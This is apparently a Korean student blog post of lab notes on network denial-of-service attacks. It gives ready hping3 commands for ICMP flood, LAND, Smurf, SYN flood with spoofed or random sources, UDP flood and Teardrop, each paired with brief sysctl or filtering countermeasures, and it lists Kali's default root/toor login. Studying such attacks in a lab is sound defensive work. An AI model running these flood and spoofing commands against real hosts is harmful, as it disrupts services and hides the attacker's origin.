2018년 4월 15일 일요일

Security- TEST

참조사이트 :
http://www.ubuntu.com/
http://www.kali.org
http://www.backtrack-linux.org
 - default ID/PW : root / toor
 - Command : startx



hping3 --icmp 192.168.x.128 -d 65000 -i u1000 -a 172.16.1.2
~ 1000분의 1초 단위로 패킷 전송

hping3 --icmp 192.168.x.128 -d 65000 --flood -a 172.16.1.2
~시스템의 가용량의 최대로 패킷을 보낸다.

# 대응 방법
 - ICMP 제한 : 정상적인 경우 Linux = 64byte, Windows = 32byte임
 - 특정 IP에서 오는 ICMP 개수를 제한 (ex. 초당 10개까지만 허용)



2. LAND Attack
출발지 주소를 Target의 주소로 스푸핑하는 Ping of Death
hping3 --icmp 192.168.x.128 -d 65000 -i u1000 -a 192.168.x.128

*대응방법
외부 네트워크에서 출발지를 내부로한 패킷이 들어오면 차단


3. Smurf Attack
 : 출발지는 Target으로 지정, 목적지를 Target이 속한 네트워크로 직접 브로드캐스트를 보내는 Ping of Death

<참고>
Broadcast :
 -제한 브로드 캐스트 (Limited Broadcast) : 모든 비트가 1 (255.255.255.255)
   > 같은 네트워크 내에서만 전달됨 (라우터가 받으면 버림)

 -직접 브로드 캐스트 (Direct Broadcast) : 네트워크 부분은 공인 IP대역 , 호스트 부분만 1로 구성 ex)168.240.15.255

hping3 --icmp 192.168.x.255 -d 65000 -i u1000 -a 192.168.x.128

*대응방법
 -sysctl -a | grep net.ipv4.icmp_*
 -sysctl -w net.ipv4.icmp_echo_ignore_broadcasts=1


4. TCP SYN Flooding
 : Backlog Queue 에 쌓이도록 유도하여 Queue 기능을 상실토록 하는 공격법
 : Time-Out이 되기 전에  Backlog Queue를 채우면 공격 성공

hping3 -S 192.168.x.128-p 80 -i u1000 -a 172.16.1.2
(-S : sync, -p 80: web server)

hping3 -S 192.168.179.128 -p 80 --flood --rand-source
(참고 --rand-source : 출발지 주소를 랜덤하게 변경)

*대응방법 : (이것만으로 전부 해결은 아님)
    sysctl -w net.ipv4.tcp_keepalive_time=1600
    sysctl -w net.ipv4.tcp_syncookies=1


5. UDP Flooding
hping3 --udp 192.168.179.128 -p 53 -i u1000 -a 172.16.1.2 -d 1470

6. Tear Drop (찢어 버리기임, 눈물 떨구기 아님)
: Offset값을 조작해서 재조립을 방해하는 공격 기법
 (Offset 값은 첫바이트를 8로 나눈 값을 번호로 사용하는 것)

hping3 --icmp 192.168.179.128 -g 200 -d 1450 -i u1000
 (-g: Offset)

댓글 없음:

댓글 쓰기

참고: 블로그의 회원만 댓글을 작성할 수 있습니다.